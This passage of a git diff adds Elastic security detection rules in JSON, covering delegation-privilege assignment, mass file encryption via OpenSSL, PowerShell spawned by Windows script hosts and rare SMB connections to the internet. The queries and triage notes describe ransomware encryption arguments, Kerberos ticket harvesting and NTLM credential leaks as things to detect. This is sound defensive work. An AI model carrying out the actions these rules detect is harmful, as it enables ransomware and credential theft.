+ "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1137", + "name": "Office Application Startup", + "reference": "https://attack.mitre.org/techniques/T1137/", + "subtechnique": [ + { + "id": "T1137.006", + "name": "Add-ins", + "reference": "https://attack.mitre.org/techniques/T1137/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_110.json b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_110.json new file mode 100644 index 00000000000..67410af8812 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_110.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the assignment of the SeEnableDelegationPrivilege sensitive \"user right\" to a user. The SeEnableDelegationPrivilege \"user right\" enables computer and user accounts to be trusted for delegation. Attackers can abuse this right to compromise Active Directory accounts and elevate their privileges.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Sensitive Privilege SeEnableDelegationPrivilege assigned to a User", + "note": "## Triage and analysis\n\n### Investigating Sensitive Privilege SeEnableDelegationPrivilege assigned to a User\n\nKerberos delegation is an Active Directory feature that allows user and computer accounts to impersonate other accounts, act on their behalf, and use their privileges. Delegation (constrained and unconstrained) can be configured for user and computer objects.\n\nEnabling unconstrained delegation for a computer causes the computer to store the ticket-granting ticket (TGT) in memory at any time an account connects to the computer, so it can be used by the computer for impersonation when needed. Risk is heightened if an attacker compromises computers with unconstrained delegation enabled, as they could extract TGTs from memory and then replay them to move laterally on the domain. If the attacker coerces a privileged user to connect to the server, or if the user does so routinely, the account will be compromised and the attacker will be able to pass-the-ticket to privileged assets.\n\nSeEnableDelegationPrivilege is a user right that is controlled within the Local Security Policy of a domain controller and is managed through Group Policy. This setting is named **Enable computer and user accounts to be trusted for delegation**.\n\nIt is critical to control the assignment of this privilege. A user with this privilege and write access to a computer can control delegation settings, perform the attacks described above, and harvest TGTs from any user that connects to the system.\n\n#### Possible investigation steps\n\n- Investigate how the privilege was assigned to the user and who assigned it.\n- Investigate other potentially malicious activity that was performed by the user that assigned the privileges using the `user.id` and `winlog.activity_id` fields as a filter during the past 48 hours.\n- Investigate other alerts associated with the users/host during the past 48 hours.\n\n### False positive analysis\n\n- The SeEnableDelegationPrivilege privilege should not be assigned to users. If this rule is triggered in your environment legitimately, the security team should notify the administrators about the risks of using it.\n\n### Related rules\n\n- KRBTGT Delegation Backdoor - e052c845-48d0-4f46-8a13-7d0aba05df82\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Remove the privilege from the account.\n- Review the privileges of the administrator account that performed the action.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.action:\"Authorization Policy Change\" and event.code:4704 and\n winlog.event_data.PrivilegeList:\"SeEnableDelegationPrivilege\"\n", + "references": [ + "https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/", + "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_alert_active_directory_user_control.yml", + "https://twitter.com/_nwodtuhs/status/1454049485080907776", + "https://www.thehacker.recipes/ad/movement/kerberos/delegations", + "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0105_windows_audit_authorization_policy_change.md" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.PrivilegeList", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f494c678-3c33-43aa-b169-bb3d5198c41d", + "setup": "## Setup\n\nThe 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policy Configuration >\nAudit Policies >\nPolicy Change >\nAudit Authorization Policy Change (Success,Failure)\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 110 + }, + "id": "f494c678-3c33-43aa-b169-bb3d5198c41d_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_5.json b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_5.json new file mode 100644 index 00000000000..6f87626e320 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_5.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when the openssl command-line utility is used to encrypt multiple files on a host within a short time window. Adversaries may encrypt data on a single or multiple systems in order to disrupt the availability of their target's data and may attempt to hold the organization's data to ransom for the purposes of extortion.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Data Encryption via OpenSSL Utility", + "query": "sequence by host.id, user.name, process.parent.entity_id with maxspan=5s\n [ process where host.os.type == \"linux\" and event.action == \"exec\" and \n process.name == \"openssl\" and process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl*\", \"php*\", \"python*\", \"xargs\") and\n process.args == \"-in\" and process.args == \"-out\" and\n process.args in (\"-k\", \"-K\", \"-kfile\", \"-pass\", \"-iv\", \"-md\") and\n /* excluding base64 encoding options and including encryption password or key params */\n not process.args in (\"-d\", \"-a\", \"-A\", \"-base64\", \"-none\", \"-nosalt\") ] with runs=10\n", + "references": [ + "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", + "https://www.trendmicro.com/en_us/research/21/f/bash-ransomware-darkradiation-targets-red-hat--and-debian-based-linux-distributions.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f530ca17-153b-4a7a-8cd3-98dd4b4ddf73", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Impact", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1486", + "name": "Data Encrypted for Impact", + "reference": "https://attack.mitre.org/techniques/T1486/" + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_6.json b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_6.json new file mode 100644 index 00000000000..ab7674879a4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_6.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when the openssl command-line utility is used to encrypt multiple files on a host within a short time window. Adversaries may encrypt data on a single or multiple systems in order to disrupt the availability of their target's data and may attempt to hold the organization's data to ransom for the purposes of extortion.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Data Encryption via OpenSSL Utility", + "query": "sequence by host.id, user.name, process.parent.entity_id with maxspan=5s\n [ process where host.os.type == \"linux\" and event.action == \"exec\" and \n process.name == \"openssl\" and process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl*\", \"php*\", \"python*\", \"xargs\") and\n process.args == \"-in\" and process.args == \"-out\" and\n process.args in (\"-k\", \"-K\", \"-kfile\", \"-pass\", \"-iv\", \"-md\") and\n /* excluding base64 encoding options and including encryption password or key params */\n not process.args in (\"-d\", \"-a\", \"-A\", \"-base64\", \"-none\", \"-nosalt\") ] with runs=10\n", + "references": [ + "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", + "https://www.trendmicro.com/en_us/research/21/f/bash-ransomware-darkradiation-targets-red-hat--and-debian-based-linux-distributions.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f530ca17-153b-4a7a-8cd3-98dd4b4ddf73", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Impact", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1486", + "name": "Data Encrypted for Impact", + "reference": "https://attack.mitre.org/techniques/T1486/" + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_110.json b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_110.json new file mode 100644 index 00000000000..cd0fd143158 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_110.json @@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a PowerShell process launched by either cscript.exe or wscript.exe. Observing Windows scripting processes executing a PowerShell script, may be indicative of malicious activity.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Script Executing PowerShell", + "note": "## Triage and analysis\n\n### Investigating Windows Script Executing PowerShell\n\nThe Windows Script Host (WSH) is an Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for the spawn of the `powershell.exe` process with `cscript.exe` or `wscript.exe` as its parent process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate commands executed by the spawned PowerShell process.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Determine how the script file was delivered (email attachment, dropped by other processes, etc.).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"cscript.exe\", \"wscript.exe\") and process.name : \"powershell.exe\" and\n not (\n process.parent.name : \"wscript.exe\" and\n process.parent.args : \"?:\\\\ProgramData\\\\intune-drive-mapping-generator\\\\IntuneDriveMapping-VBSHelper.vbs\" and\n process.parent.args : \"?:\\\\ProgramData\\\\intune-drive-mapping-generator\\\\DriveMapping.ps1\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_111.json b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_111.json new file mode 100644 index 00000000000..1d71ba1390a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_111.json @@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a PowerShell process launched by either cscript.exe or wscript.exe. Observing Windows scripting processes executing a PowerShell script, may be indicative of malicious activity.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Script Executing PowerShell", + "note": "## Triage and analysis\n\n### Investigating Windows Script Executing PowerShell\n\nThe Windows Script Host (WSH) is an Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for the spawn of the `powershell.exe` process with `cscript.exe` or `wscript.exe` as its parent process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate commands executed by the spawned PowerShell process.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Determine how the script file was delivered (email attachment, dropped by other processes, etc.).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"cscript.exe\", \"wscript.exe\") and process.name : \"powershell.exe\" and\n not (\n process.parent.name : \"wscript.exe\" and\n process.parent.args : \"?:\\\\ProgramData\\\\intune-drive-mapping-generator\\\\IntuneDriveMapping-VBSHelper.vbs\" and\n process.parent.args : \"?:\\\\ProgramData\\\\intune-drive-mapping-generator\\\\DriveMapping.ps1\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_2.json b/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_2.json new file mode 100644 index 00000000000..4af3afa1a43 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_2.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects rare internet network connections via the SMB protocol. SMB is commonly used to leak NTLM credentials via rogue UNC path injection.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Rare SMB Connection to the Internet", + "new_terms_fields": [ + "destination.ip" + ], + "query": "event.category:network and host.os.type:windows and process.pid:4 and \n network.transport:tcp and destination.port:(139 or 445) and \n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n", + "references": [ + "https://www.securify.nl/en/blog/living-off-the-land-stealing-netntlm-hashes/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 47, + "rule_id": "f580bf0a-2d23-43bb-b8e1-17548bb947ec", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": 